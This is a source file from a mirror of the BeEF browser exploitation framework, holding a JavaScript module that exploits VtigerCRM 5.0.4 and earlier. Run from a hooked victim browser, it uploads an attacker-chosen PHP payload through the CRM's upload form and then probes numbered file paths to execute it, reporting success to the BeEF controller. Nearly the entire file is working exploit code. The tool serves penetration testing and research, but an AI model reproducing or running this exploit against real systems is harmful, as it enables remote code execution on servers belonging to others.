Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
cb4df3a72c2cf8e9d80b6f64b62fe31bdef033a7
beef/modules/exploits/vtiger_crm_upload_exploit/command.js
Wade Alcorn 2fbca61368 Updated copyright dates
2014-12-30 07:44:58 +10:00

210 lines
5.7 KiB
JavaScript
Raw Blame History

//
// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
// VtigerCRM <= 5.0.4 "chained exploitation" PoC
// Hacked up for OWASP New Zealand Day, July 13th 2009
//
// Thanks for the BeEF Wade :)
// Ported to Ruby BeEF by xntrik 2010
beef.execute(function() {
//Doing the same trick I used in detect_tor to ensure exploit runs once
// xntrik
if (document.getElementById('vtigerimg')) {
//document.body.removeChild(document.getElementById('vtigerimg'));
//beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=There was a stagnant vtiger ID. Aborted!');
return "Exploit running already";
}
var img = new Image();
img.setAttribute("style","visibility:hidden");
img.setAttribute("width","0");
img.setAttribute("height","0");
img.id = 'vtigerimg';
document.body.appendChild(img);
baseurl = "<%= @vtiger_url %>";
function get_ajax() {
var http_request;
// use the ActiveX control for IE5.x and IE6
try {
http_request = new ActiveXObject("MSXML2.XMLHTTP");
} catch (othermicrosoft){
try {
http_request = new ActiveXObject("Microsoft.XMLHTTP");
} catch (native) {
// If IE7, Mozilla, Safari, etc: Use native object
http_request = new XMLHttpRequest();
}
}
return http_request;
}
function do_upload(){
setTimeout(function() {ajax_upload()}, 1000);
}
// In a nutshell:
//
// 1) build url
// 2) construct the request object
// 3) POST the form
// 4) once requestdone, call do_callfile()
function ajax_upload(){
var targeturl = baseurl + '/index.php?module=uploads&action=add2db&return_module=Home&return_action=index';
var http_request;
http_request = false;
http_request = get_ajax();
if (!http_request) {
// fail silently!
return false;
}
//prepare the POST
var boundaryString = 'PWNED';
var boundary = '-----------------------------PWNED';
var requestbody =
boundary + '\r\n'
+ 'Content-Disposition: form-data; name="MAX_FILE_SIZE"' + '\r\n'
+ '\r\n'
+ 3000000 + '\r\n'
+ boundary
+ '\r\n'
+ 'Content-Disposition: form-data; name="return_module"' + '\r\n'
+ '\r\n'
+ '\r\n'
+ boundary
+ '\r\n'
+ 'Content-Disposition: form-data; name="return_action"' + '\r\n'
+ '\r\n'
+ '\r\n'
+ boundary
+ '\r\n'
+ 'Content-Disposition: form-data; name="return_id"' + '\r\n'
+ '\r\n'
+ '\r\n'
+ boundary
+ '\r\n'
+ 'Content-Disposition: form-data; name="uploadsubject"' + '\r\n'
+ '\r\n'
+ '\r\n'
+ boundary
+ '\r\n'
+ 'Content-Disposition: form-data; name="filename"; filename="<%= @mal_filename %>.<%= @mal_ext %>"' + '\r\n'
+ 'Content-Type: application/x-httpd-php' + '\r\n'
+ '\r\n'
+ '<%= @vtiger_php %>' + '\r\n'
+ '\r\n'
+ boundary
+ '\r\n'
+ 'Content-Disposition: form-data; name="filename_hidden"' + '\r\n'
+ '\r\n'
+ '<%= @mal_filename %>.<%= @mal_ext %>'
+ '\r\n'
+ boundary
+ '\r\n'
+ 'Content-Disposition: form-data; name="txtDescription"' + '\\r\n'
+ '\r\n'
+ 'drop it like its hot' + '\r\n'
+ boundary
+ '\r\n'
+ 'Content-Disposition: form-data; name="save"' + '\r\n'
+ '\r\n'
+ 'Attach' + '\r\n'
+ boundary;
var uploadstate = 0;
http_request.onreadystatechange = function() {
if (http_request.readyState == 4) {
if (http_request.status == 200) {
uploadstate = 3;
} else {
uploadstate = 2;
}
} else {
uploadstate = 1;
}
return;
};
http_request.open("POST", targeturl, true);
http_request.setRequestHeader("Content-type", "multipart/form-data; boundary=---------------------------PWNED");
http_request.setRequestHeader("Content-length", requestbody.length);
http_request.send(requestbody);
setTimeout(function() {
if (uploadstate == 0) {
//something went way wrong
document.body.removeChild(document.getElementById('vtigerimg'));
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Error in file upload');
} else if (uploadstate == 1) {
//we never got a response from the server
document.body.removeChild(document.getElementById('vtigerimg'));
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Server did not respond while trying to upload file');
} else if (uploadstate == 2) {
//we got a response that was NOT a 200
document.body.removeChild(document.getElementById('vtigerimg'));
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Server gave an invalid response while trying to upload file');
} else if (uploadstate == 3) {
//We got a 200, so hopefully the file was uploaded
//be_graceful();
do_callfile(0, 1000);
}
},<%= @upload_timeout %>);
return;
}
function do_callfile(start, count){
if (document.getElementById('vtigerimg') == null) {
return false;
}
for (i=start;i<=start+count;i++)
{
var http_request = false;
http_request = get_ajax();
if (!http_request) {
// fail silently!
return false;
}
var findurl = baseurl + "<%= @vtiger_filepath %>" + i + "_<%= @mal_filename %>.<%= @mal_ext %>";
var requestbody = "birds of a feather flock together";
http_request.open('POST', findurl, false);
http_request.setRequestHeader("Content-length", requestbody.length);
http_request.send(requestbody);
if (http_request.status == 200) {
document.body.removeChild(document.getElementById('vtigerimg'));
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=File Uploaded AND Executed ('+findurl+')');
return;
}
}
return;
}
// Try the upload
function do_main(){
do_upload();
return;
}
// Run the sploit
do_main();
});
Reference in New Issue View Git Blame Copy Permalink